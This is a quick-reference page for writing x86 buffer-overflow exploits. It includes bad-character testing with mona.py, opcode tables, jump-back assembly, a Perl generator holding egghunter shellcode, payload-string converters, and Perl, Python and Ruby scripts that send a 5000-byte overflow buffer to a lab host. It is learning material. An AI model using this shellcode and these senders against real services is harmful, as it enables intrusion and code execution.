Quick reference for exploit development. Search the page and find what you need.

  1. Badchars
  2. ASM
  3. Egghunter
  4. Convert file to binary string
  5. Sending the payload

Badchars

All possible hex characters

"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"+
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"+
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"+
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"+
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"+
"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"+
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"+
"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"+
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"+
"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"+
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"+
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"+
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"+
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"+
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"+
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

\x00 is almost always a bad character (it terminates C strings), so you can usually exclude it before testing.

Find badchars with mona.py

Generate bytearray:

!mona bytearray -b "\x00"

Compare memory at crash with previously generated bytearray:

!mona compare -f bytearray.bin -a <address>

where <address> is where your buffer landed in memory at the crash (the first byte that is altered or missing in the comparison is the next bad character to exclude).
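As an added example (not mona.py's code), the comparison above done by hand: build the test buffer minus the characters already known to be bad, diff it against a memory dump taken at the crash, and report the first byte that was altered or cut off. The dumps in the demo are constructed to mimic two common behaviours, truncation at a line feed and substitution of a byte.

```python
# Added example (not mona.py's code). Builds the bad-character test buffer and
# compares it with a memory dump taken at the crash, the way !mona compare does:
# the first byte that is altered or cut off is the next bad character to exclude.

def bytearray_without(exclude=b"\x00"):
    """All 256 byte values in order, minus the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def compare_with_dump(sent, dump):
    """List (offset, expected, found) for every position where the dump differs.

    A dump shorter than the buffer means something truncated the copy, so
    missing bytes are reported with found=None rather than ignored.
    """
    diffs = []
    for i, expected in enumerate(sent):
        found = dump[i] if i < len(dump) else None
        if found != expected:
            diffs.append((i, expected, found))
    return diffs


def first_badchar(sent, dump):
    """Value of the first byte that was changed or cut off; None if all match."""
    diffs = compare_with_dump(sent, dump)
    return diffs[0][1] if diffs else None


if __name__ == "__main__":
    buf = bytearray_without(b"\x00")
    # Constructed dump: a target that stops copying at a line feed (0x0a)
    truncated = buf[:buf.index(0x0a)]
    print("truncated at: 0x%02x" % first_badchar(buf, truncated))
    # Constructed dump: a target that rewrites 0x0d to 0x00 but keeps the length
    mangled = buf.replace(b"\x0d", b"\x00")
    print("mangled byte: 0x%02x" % first_badchar(buf, mangled))
    # Constructed dump: identical copy, nothing left to exclude
    print("clean:", first_badchar(buf, buf))
```

Exclude the reported byte, regenerate the buffer and repeat until the dump matches; substitutions (same length, different value) and truncation (shorter dump) are both caught because missing bytes count as differences.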

ASM

Assembler

Assemble a file with nasm (the default output format is a flat binary):

nasm jmp.bin

Interactive assembler that prints the opcodes for each instruction you type:

msf-nasm_shell

Jumps

Jumps to registers

jmp eax \xff\xe0
jmp ecx \xff\xe1
jmp edx \xff\xe2
jmp ebx \xff\xe3
jmp esp \xff\xe4
jmp ebp \xff\xe5
jmp esi \xff\xe6
jmp edi \xff\xe7

Arbitrary jump back

Jumps back 512 bytes from current instruction:

[BITS 32]

global _start
_start:

;--- copy eip into ecx
;--- Taken from Phrack #62 Article 7, originally written by Aaron Adams
;--- http://phrack.org/issues/62/7.html (search the page for Aaron Adams)

fldz
fnstenv [esp-12]  ; the saved FPU instruction pointer (offset 12 of the env) lands at [esp]
pop ecx           ; ecx = address of fldz
add cl, 10        ; ecx = address of the nop below (carries out of cl if the low byte of the address is above 0xf5)
nop

;--- Decrease ecx and jump to it
dec ch            ; ecx -= 256
dec ch            ; ecx -= 256 (now 512 bytes before the nop)
jmp ecx

Math

Clear a register

xor eax,eax   \x31\xc0
xor ebx,ebx   \x31\xdb
xor edx,edx   \x31\xd2
xor ecx,ecx   \x31\xc9
xor ebp,ebp   \x31\xed
xor esi,esi   \x31\xf6
xor edi,edi   \x31\xff

Add a small constant (signed imm8, -128 to 127) to a register

add eax, 10  \x83\xc0\x0a
add eax, 127 \x83\xc0\x7f

To add to a different register, change the \xc0 byte: it is \xc0 plus the register number in the order used by POP/PUSH below (eax=0, ecx=1, edx=2, ebx=3, esp=4, ebp=5, esi=6, edi=7), e.g. \xc4 for esp.

Stack

POP

pop eax \x58
pop ecx \x59
pop edx \x5a
pop ebx \x5b
pop esp \x5c
pop ebp \x5d
pop esi \x5e
pop edi \x5f

PUSH

push eax \x50
push ecx \x51
push edx \x52
push ebx \x53
push esp \x54
push ebp \x55
push esi \x56
push edi \x57

Egghunter

Mona.py

!mona egghunter -t ABCD

Use the egg ABCDABCD.

Egg hunter by Matt Miller

You can use the following script to generate an egghunter code.

#!/usr/bin/perl

# Prints egghunter code to be pasted into an exploit.
# Example:
# $ ./egghunter.pl 41424344

use strict;
use warnings;

# This is the egghunter implementation by Matt Miller; the four bytes of
# $ARGV[0] (8 hex digits) are placed where the egg goes.
my $egghunter = "\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x%s\\x%s\\x%s\\x%s\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7";

my $egg = $ARGV[0];
die "usage: $0 <egg as 8 hex digits, e.g. 41424344>\n"
    unless defined $egg && $egg =~ /^[0-9a-fA-F]{8}$/;
my @chars = ($egg =~ m/../g);    # split into four two-digit bytes
printf($egghunter, @chars);
print("\n");

I keep a gist with this simple perl script, in the future there might be a less minimal version here:

egghunter-perl

Convert file to binary string

You can use the following script to convert any binary file compiled with nasm into a binary string that can be pasted into an exploit:

#!/usr/bin/perl
use strict;
use warnings;

my $file = $ARGV[0];
die "usage: $0 <file>\n" unless defined $file;
open(my $fh, '<:raw', $file) or die "cannot open $file: $!\n";
while (my $bytes_read = read $fh, my $bytes, 1) {
    printf("\\x%02x", ord($bytes));    # one byte at a time, as \xNN
}
print("\n");
close($fh);

I keep a gist with this simple perl script, in the future there might be a less minimal version here:

File2Payload

Use it with:

$ nasm jmpesp.bin
$ ./file2payload.pl jmpesp
\xff\xe4
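As an added example (not the gist's code), a Python equivalent of the conversion script above that also goes the other way, parsing a pasted "\x.." string (including the quoted, "+"-joined layout used in the bad-character list at the top of this page) back into bytes, and reporting which bytes fall in a bad-character set so a pasted string can be checked before use. The sample bytes in the demo are constructed.

```python
import re

# Added example (not the gist's code): escape a flat binary the way the Perl
# script above does, parse the escaped form back into bytes, and flag any
# bytes that are in a bad-character set.

_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def bytes_to_escaped(data):
    r"""b'\xff\xe4' -> the text \xff\xe4, the form pasted into an exploit string."""
    return "".join("\\x%02x" % b for b in data)


def escaped_to_bytes(text):
    r"""Inverse of bytes_to_escaped. Quotes, '+' and whitespace between the
    escapes are tolerated; anything else is rejected so a typo is not silently
    dropped."""
    leftover = _ESCAPE.sub("", text).strip('"+ \n\r\t')
    if leftover:
        raise ValueError("unexpected characters in escaped string: %r" % leftover)
    return bytes(int(h, 16) for h in _ESCAPE.findall(text))


def file_to_escaped(path):
    """Read an assembled flat binary (nasm's default output) and escape it."""
    with open(path, "rb") as fh:
        return bytes_to_escaped(fh.read())


def badchars_in(data, badchars=b"\x00"):
    """(offset, value) for each byte of data that is in the bad-character set."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        text = file_to_escaped(sys.argv[1])
    else:
        # Constructed sample: xor eax,eax ; push eax (contains no bad bytes)
        text = bytes_to_escaped(b"\x31\xc0\x50")
    print(text)
    code = escaped_to_bytes(text)
    for off, val in badchars_in(code, b"\x00\x0a\x0d"):
        print("bad byte 0x%02x at offset %d" % (val, off))
```

Running it with a file argument does what ./file2payload.pl does; the round trip through escaped_to_bytes is what lets you paste a string from somewhere else, check it against your bad-character set, and know the byte count before it goes into a buffer.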

Sending the payload

Perl

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

my $host = "192.168.1.121";
my $port = 9999;

my $payload = "A" x 5000;

my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                 PeerPort => $port,
                                 Proto    => 'tcp')
    or die "cannot connect to $host:$port: $!\n";
$sock->send("COMMAND " . $payload . "\n");
close $sock;

Python

#!/usr/bin/python
import socket

target = "192.168.1.121"
port = 9999

payload = b"A" * 5000   # bytes, so the same script runs under Python 2 and 3

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendall(b"COMMAND " + payload + b"\n")   # sendall keeps going until the whole buffer is sent
s.close()

Ruby

#!/usr/bin/ruby
require 'socket'

target = '192.168.1.121'
port = 9999

payload = "A" * 5000

s = TCPSocket.open(target, port)
s.puts('COMMAND ' + payload)
s.close()